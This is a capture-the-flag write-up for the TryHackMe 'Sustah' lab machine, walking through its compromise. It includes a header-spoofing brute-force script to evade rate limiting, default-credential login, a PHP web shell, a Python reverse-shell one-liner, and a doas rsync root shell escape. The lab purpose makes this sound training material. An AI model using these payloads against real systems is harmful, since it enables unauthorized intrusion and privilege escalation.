Sustah tryhackme Writeup (Medium)

Enumeration (NMAP, Services)

nmap -sC -sV 10.10.153.95 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-16 19:29 EDT
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 19:30 (0:00:12 remaining)
Nmap scan report for 10.10.153.95
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
|   256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
|_  256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open  http    Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds

As we can see there is three ports open currently, lets review the services running on these ports.

• 22 is running OpenSSH 7.2p2

• 80 is running Apache HTTPD

• 8085 is running Gunicorn Python web server

Gunicorn web server enumeration

Navigating to http://10.10.153.95:8085/ we see the following.

It seems we have to guess a number and we get some sort of output that is a "reward" but if that number is wrong than we get an error.

I intercepted the request using Burp Suite and sent it to the intruder so we can brute-force this number.

After doing the stuff I have done above click start attack.

Bypassing rate limiting

There seems to be a rate limit, we have to bypass this rate limit else we cannot brute-force the lucky number. We can try some common headers E.g.

X-Fowarded-For X-Fowarded-IP X-Fowarded-Host

I am going to do this in Python, we will use the requests module so we can set headers and try to bypass the rate limit.

import requests
import random 
import sys 

url = "http://10.10.252.25:8085/"

for i in range(100000):
                        headers = {
                                    "X-Remote-IP":"127.0.0.1",
                                    "X-Remote-Addr":"127.0.0.1",
                                    "X-Fowarded-For":"127.0.0.1",
                                    "X-Forwarded-IP":"127.0.0.1",
                                    "X-Host":"127.0.0.1",
                                    "X-Forwarded-Host":"127.0.0.1",
                                   }
                        obj = {'number':i}
                        req = requests.post(url, data=obj, headers=headers)
                        if("Oh no! How unlucky. Spin the wheel and try again." not in req.text):
                                                                                                  print("{} is the lucky number!",i)
                                                                                                  sys.exit()

I know its messy, I didn't use any kind of IDE and I wrote it quite early in the morning.

Now we have the code, lets enter the code into the "Input" text box. We get given a path.

I tried going to the path but got an error, lets try on the Apache HTTP Server.

Apache HTTP Enumeration

Navigate to 10.10.153.95/YouGotTh3P@th This is running Mara CMS, we can try logging in using default credentials. Navigate to the following URL. 10.10.153.95/YouGotTh3P@th/?login

• Username:admin

• password:changeme

The default credential's worked and we are logged in as an administrator.

Googling "MaraCMS" we see an RCE on exploit-db.

Read exploit-db.com/exploits/48780 which explains in detail how the RCE works, its pretty basic firstly go to /YouGotTh3P@th/codebase/dir.php?type=filenew now create a PHP File called shell.php and add the following code into the PHP File.

'<?php system($_GET["cmd"]) ?>'

Now we need to upload this file onto the server.

• curl -X POST 10.10.153.95/YouGotTh3P@th/img/shell.php?cm..

  Or navigate to the following URL

• 10.10.153.95/YouGotTh3P@th/img/shell.php?cm..

Now lets get a reverse shell on the box, we have RCE.

• 10.10.153.95/YouGotTh3P@th/img/shell.php?cm.. -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",$PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

• python3 -c 'import pty;pty.spawn("/bin/bash")'

• export TERM=xterm

After some time of enumerating I checked the /opt directory which contained nothing we couldn't get the user flag as it was owned by Kiran and not readable for us, I continued to check /var/backups

• cd /var/backups

• ls -al

ls -al
total 636
drwxr-xr-x  2 root root     4096 Dec  9  2020 .
drwxr-xr-x 14 root root     4096 Dec  6  2020 ..
-r--r--r--  1 root root     1722 Dec  6  2020 .bak.passwd
-rw-r--r--  1 root root    51200 Dec  6  2020 alternatives.tar.0
-rw-r--r--  1 root root     6308 Dec  9  2020 apt.extended_states.0
-rw-r--r--  1 root root      715 Dec  6  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root      509 Nov 12  2020 dpkg.diversions.0
-rw-r--r--  1 root root      207 Dec  6  2020 dpkg.statoverride.0
-rw-r--r--  1 root root   547201 Dec  6  2020 dpkg.status.0
-rw-------  1 root root      849 Dec  6  2020 group.bak
-rw-------  1 root shadow    714 Dec  6  2020 gshadow.bak
-rw-------  1 root root     1695 Dec  6  2020 passwd.bak
-rw-------  1 root shadow   1031 Dec  6  2020 shadow.bak

As we can see, we are able to read ".bak.passwd" which the actual file is "passwd.bak" I thought this was suspicious and decided to cat the file contents.

• cat .bak.passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
kiran:x:1002:1002:trythispasswordforuserkiran:/home/kiran:

Possible credentials below

• Username:Kiran

• Password:trythispasswordforuserkiran

That worked! Ez pwn

I navigated to /home/kiran and read the "user.txt"

Now I am going to get linpeas.sh on the box which is an easy way to enumerate for priv esc.

Awesome!

Inside of the "doas" configuration file it shows we can run the "rsync" binary as root with no password, this is a possible priv esc.

• doas rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

Done. We've rooted the machine, it was a fun one! I hope you've enjoyed and learned something today.

Feel free to follow our Twitter